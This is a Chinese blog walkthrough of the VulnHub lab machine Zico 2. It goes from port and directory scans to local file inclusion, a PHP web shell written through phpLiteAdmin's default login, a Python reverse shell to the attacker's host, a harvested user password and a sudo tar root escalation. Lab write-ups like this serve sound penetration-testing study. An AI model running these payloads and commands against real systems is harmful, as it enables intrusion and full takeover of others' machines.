vulnhub系列:Zico 2

最新推荐文章于 2024-09-07 22:37:02 发布
最新推荐文章于 2024-09-07 22:37:02 发布
阅读量384 收藏 3
点赞数 5
分类专栏: vulnhub系列 文章标签: web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jq_j37/article/details/140892641
版权

vulnhub系列:Zico 2

靶机下载

一、信息收集

nmap扫描存活,根据mac地址找对应靶机

nmap 192.168.23.0/24

image-20240802170628260

nmap扫描端口,开放端口22、80、111、44623

nmap 192.168.23.173 -p- -sV -Pn -O

image-20240802170830582

dirb目录扫描,存在目录dbadmin、tools等

dirb http://192.168.23.173/

image-20240802171239273

访问80端口

image-20240802171304879

在页面最后发现一个功能点,点击后,url可以看到疑似存在文件包含

image-20240802171746533

image-20240802171822458

验证一下,修改url中page参数,存在文件包含

http://192.168.23.173/view.php?page=../../..//etc/passwd

image-20240802172006520

拼接访问目录扫描到的dbadmin目录,发现一个test_db.php文件

image-20240802183352298

访问文件,是一个数据库管理工具phpLiteadmin,版本1.9.3

image-20240802183445192

kali中搜一下相关的漏洞,有一个对应版本的漏洞

searchsploit phpLiteadmin

image-20240802183800473

看一下怎么利用这个漏洞

cat /usr/share/exploitdb/exploits/php/webapps/24044.txt

这里提到要创建一个数据库,在表的字段中写入一句话木马

image-20240802184322382

网上搜了一下,这个管理工具的默认密码为admin,尝试登录,登录成功

image-20240802185057817

创建一个hack.php数据库

image-20240802185213508

点击/usr/databases/hack.php,然后创建一个表hack

image-20240802190525105

选择text,字段名为phpinfo,写入phpinfo

<?php phpinfo();?>

image-20240802190545870

利用文件包含漏洞,包含hack.php,正常解析

http://192.168.23.173/view.php?page=../../..//usr/databases/hack.php

image-20240802191124883

二、getshell

删除hack表,重新创建一个shell表,字段名getshell,写入内容

<?php @system($_POST[cmd]);?>

kali开启监听

nc -lvnp 4444

image-20240802192038603

使用hackbar,提交post参数

cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.23.133",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

image-20240802191856482

成功反弹shell

image-20240802191954543

三、提权

通过python转为交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

image-20240802192314463

在zico家目录下找到wordpress,在目录中发现wp-config.php,在文件中找到zico的密码

zico:sWfCsfJSPV9H3AmQzw8

image-20240802192613273

切换到zico用户

su zico

image-20240802192830241

查看当前权限

sudo -l

image-20240802192906753

可以利用 tar 或 zip提权,这里我利用tar提权,提权成功

sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

image-20240802193025061

三天三夜睡不着
关注
专栏目录
Vulnhub实战:zico2
qq_24033605的博客
08-12 270
描述: 收集信息: 靶机开放了三个端口,ssh,http,rpc。 先进入80端口进行查看。 发现个文件包含漏洞。 尝试读取passwd文件 成功读取后,进行目录扫描。 找到了几个目录,看着dbadmin像是后台数据库,查看一下 尝试了几个弱密码,是admin 查看数据库发现两个用户信息,一个是root,一个是zico,md5爆破密码。 尝试ssh登录,发现密码不对,返回去找了个phpliteadmin的漏洞。 按照上述步骤,创建数据库,创建表,将一句话木马写入。 成功写入,
Vulnhub:Zico2靶机
qq_43884092的博客
03-25 190
view.php测试出文件包含,dbadmin目录存在phpliteadmin,搜索该cms,发现该版本存在代码注入,通过弱口令admin进入phpliteadmin后台,写入一句话,在/home/zico/wordpress/wp-config.php发现zico用户的密码
VULNHUB靶机渗透——ZICO2:1
aarong的博客
12-15 1100
本渗透测试中使用的工具有Arp-scan(获取IP)、Nmap(获取目标开放端口和服务信息)、Dirb(网站目录爆破工具)、Zap(漏洞扫描工具)、在线密文破解工具等等。 \1) arp-scan扫描 NAT模式下,arp-scan扫描出靶机的IP:192.168.65.134 \2) Nmap扫描 获取开放端口及服务的全部信息 浏览器打开开启的网站 界面如下,是一个网络购物平台的网站。 \3) Dirb爆破 命令:dirb http://192.168.65.134 爆破结果发现类似于数
Vulnhub-Zico2靶机实战
御七彩虹猫
03-24 3219
Vulnhub-Zico2靶机实战
Vulnhub靶机-Zico2
ergeLXT的博客
07-23 509
得到靶机IP:192.168.127.146。
vulnhub zico2: 1
箭雨镜屋
11-27 2880
本文攻击路径是:nmap扫描-->访问80端口发现文件包含漏洞-->dirb扫描网站目录-->利用默认密码登录phpLiteAdmin-->利用phpLiteAdmin 1.9.3的漏洞结合文件包含漏洞getshell-->脏牛提权(或者sudo tar提权)
Vulnhub靶场渗透-zico2
paidx0
10-01 1272
前言 靶机ip(192.168.110.128) 攻击机ip(192.168.110.127) 网络NAT模式 这段时间一直在忙别的事,有两个礼拜没有学习了,哈哈哈 信息收集 打开网站每个页面都简单看了看,发现一个很明显的LFI,先记录下来肯定能用上 继续看就没有什么东西了,网页功能也比较简单,现在再来扫一下目录 很明显是数据库,手试了一波弱口令给我进去了,就是admin 漏洞挖掘 简单说一下 phpliteadmin 其实就是一个类似于 phpmyadmin的一个数据库管理工具 注意他的版本,
vulnhub靶场】Zico 2靶机提权
qq_46421742的博客
08-01 271
免责声明:本文属于个人笔记,仅用于学习,禁止使用于任何违法行为,任何违法行为与本人无关。
vulnhub渗透系列zico2(内含zip提权和脏牛提权)
来到了学渣的博客
02-02 2219
我是啊锋,一个努力的学渣,作为一个刚进入安全大门的小白,我希望能把自己所学到的东西总结出来,分享到博客上,可以一起进步,一起交流,一起学习。 我这个靶机总结了两种反弹shell和两种提权的方法(python反shell和zip提权、php反shell和 脏牛提权)并且有我错误的经验。希望能帮助到你们 实验过程总结 1.探测发现开放端口22、80、111端口,发现页面存在文件包含漏洞,dirb目...
VMware的Zico2虚拟机
05-12
VMware的Zico2虚拟机是一款基于VMware平台的预配置虚拟机,它专为测试、演示或开发目的设计。Zico2虚拟机的核心在于它提供了便捷的环境,让用户能够快速部署一个完整的操作系统实例,而无需从零开始安装和配置。在IT...
靶机综合渗透环境(zico2手册).pdf
04-07
靶机综合渗透环境——zico2渗透实战
小白的靶机VulnHub-zico2
wo41ge的博客
02-01 207
靶机地址:https://www.vulnhub.com/entry/zico2-1,210/ 依然是选择桥接 开机界面就是这样 确定靶机的IP地址 可以看到靶机开启了22、80、111、50702端口 直接访问页面
网络安全 DVWA通关指南 DVWA Reflected Cross Site Scripting (反射型 XSS)
YueXuan_521的博客
09-07 538
这篇文章是关于网络安全中的DVWA平台上反射型XSS(跨站脚本)漏洞的通关指南。文章详细介绍了XSS的原理、危害及不同难度级别的防御措施。XSS漏洞出现在未经验证或转义用户输入数据的页面中,导致攻击者能执行恶意脚本。文章通过具体代码示例,展示了Low、Medium、High和Impossible四个安全级别的防御措施,包括禁用XSS防护、简单替换特定标签、使用正则表达式过滤和结合Anti-CSRF令牌等方法。最后,文章强调了对用户输入数据进行适当过滤和转义的重要性。
网络安全】空字节绕过:URL回调+XSS+SQL绕WAF
最新发布
等风来
09-07 415
经过进一步测试,我发现WAF在解析HTTP请求时,如果发现恶意查询,会导致服务器挂起。如果我连续提交3个请求且服务器挂起,它就会阻止我的IP地址。
Web安全之SQL注入:如何预防及解决
J老熊
09-07 1494
SQL注入是一种通过在用户输入中嵌入恶意SQL代码的攻击方式。攻击者可以利用漏洞在未经授权的情况下访问数据库,执行原本不被允许的操作。例如,攻击者可以绕过身份验证、检索敏感信息,甚至删除数据。SQL注入是Web应用程序中最常见且最危险的安全漏洞之一,尤其是在涉及数据库操作的场景下,如电商交易系统。通过使用、严格的输入验证、最小权限原则以及使用ORM框架等方法,我们可以有效防止SQL注入攻击。开发人员需要养成良好的编码习惯,始终考虑潜在的安全问题,确保应用程序的安全性。
如何启动网络安全计划:首先要做的事情
网络研究观
09-07 1005
保护数据不是一次性的活动,而是一个持续的适应和改进过程。
网络安全】服务基础第二阶段——第三节:Linux系统管理基础----Linux用户与组管理
goldfish8848的博客
09-07 785
SUID、SGID 和 Sticky Bit 都在Linux提权中扮演了重要⻆⾊。
网络安全】漏洞挖掘
anquan2233的博客
08-29 1860
在springframeworl/expression/spel/stand/InternalSpelExpressionParser/doParseExpression()方法中、会在tokenizer.process()中 对token进行 源码与字节码的判断操作、继续向下。会进入到springframework/cloud/function/context/config/RoutingFunction/functionFromExpression()方法。Payload 的构造可以参考官方测试用例。
Zico2靶机渗透测试实战指南
"该文档是关于使用Zico2作为靶机进行渗透测试的实战指南,主要涵盖实验环境的设置、信息收集以及渗透测试的步骤。Zico2是一个用于安全研究和教育的虚拟机,适用于练习渗透测试技术。" 在渗透测试领域,Zico2靶机...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值